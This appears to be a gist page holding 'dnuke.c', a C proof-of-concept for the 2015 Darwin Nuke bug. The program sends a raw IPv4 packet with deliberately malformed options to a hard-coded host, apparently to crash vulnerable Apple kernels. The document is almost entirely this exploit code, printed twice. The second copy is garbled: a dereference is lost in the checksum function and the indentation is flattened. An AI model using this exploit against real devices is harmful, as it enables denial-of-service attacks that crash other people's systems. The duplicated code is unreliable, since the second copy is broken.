hghwng/dnuke.c

## dnuke.c
/*
 * Darwin Nuke PoC
 * (C) 2015 Hugh Wang
 * Licence: MIT
 *
 * Original research: https://sourceware.org/ml/ecos-discuss/2009-04/msg00031.html
 * With the help from Kaspersky: https://securelist.com/blog/69462/darwin-nuke/
 *
 */

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>

uint16_t ip_checksum(uint16_t *addr, int count)
{
	uint32_t sum = 0;
	while (count > 1) {
		sum += *(addr++);
		count -= 2;
	}
	if (count > 0) sum += *(uint8_t *) addr;
	while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
	return ~sum;
}

int main(int argc, char *argv[])
{
	char packet[125] = {0};

	struct ip iphdr;
	iphdr.ip_hl = 60 / sizeof (uint32_t); // header length
	iphdr.ip_v = 4;			// version
	iphdr.ip_tos = 0;		// type of service
	iphdr.ip_len = htons(sizeof(packet));
	iphdr.ip_id = htons(0);		// sequence number
	iphdr.ip_ttl = 255;
	iphdr.ip_p = IPPROTO_TCP;

	if (!inet_pton(AF_INET, "192.168.1.253", &(iphdr.ip_src))) return -1;
	if (!inet_pton(AF_INET, "192.168.1.100", &(iphdr.ip_dst))) return -1;

	memcpy(packet, &iphdr, sizeof(struct iphdr));
	packet[sizeof(struct iphdr)] = 0xff;	// make an error in options
	iphdr.ip_sum = ip_checksum((uint16_t *) &iphdr, 60);

	struct sockaddr_in sin;
	memset (&sin, 0, sizeof(struct sockaddr_in));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = iphdr.ip_dst.s_addr;

	int sock;
	if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) return -2;

	int enabled = 1;
	if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enabled, sizeof(enabled)) < 0)
		return -3;

	if (sendto(sock, packet, sizeof(packet), 0, (struct sockaddr *)&sin,
		sizeof (struct sockaddr)) < 0)  return -4;

	close(sock);
	return 0;
}
	/*
	* Darwin Nuke PoC
	* (C) 2015 Hugh Wang
	* Licence: MIT
	*
	* Original research: https://sourceware.org/ml/ecos-discuss/2009-04/msg00031.html
	* With the help from Kaspersky: https://securelist.com/blog/69462/darwin-nuke/
	*
	*/

	#include <string.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <sys/socket.h>
	#include <netinet/ip.h>
	#include <arpa/inet.h>

	uint16_t ip_checksum(uint16_t *addr, int count)
	{
	uint32_t sum = 0;
	while (count > 1) {
	sum += *(addr++);
	count -= 2;
	}
	if (count > 0) sum += (uint8_t ) addr;
	while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
	return ~sum;
	}

	int main(int argc, char *argv[])
	{
	char packet[125] = {0};

	struct ip iphdr;
	iphdr.ip_hl = 60 / sizeof (uint32_t); // header length
	iphdr.ip_v = 4; // version
	iphdr.ip_tos = 0; // type of service
	iphdr.ip_len = htons(sizeof(packet));
	iphdr.ip_id = htons(0); // sequence number
	iphdr.ip_ttl = 255;
	iphdr.ip_p = IPPROTO_TCP;

	if (!inet_pton(AF_INET, "192.168.1.253", &(iphdr.ip_src))) return -1;
	if (!inet_pton(AF_INET, "192.168.1.100", &(iphdr.ip_dst))) return -1;

	memcpy(packet, &iphdr, sizeof(struct iphdr));
	packet[sizeof(struct iphdr)] = 0xff; // make an error in options
	iphdr.ip_sum = ip_checksum((uint16_t *) &iphdr, 60);

	struct sockaddr_in sin;
	memset (&sin, 0, sizeof(struct sockaddr_in));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = iphdr.ip_dst.s_addr;

	int sock;
	if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) return -2;

	int enabled = 1;
	if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enabled, sizeof(enabled)) < 0)
	return -3;

	if (sendto(sock, packet, sizeof(packet), 0, (struct sockaddr *)&sin,
	sizeof (struct sockaddr)) < 0) return -4;

	close(sock);
	return 0;
	}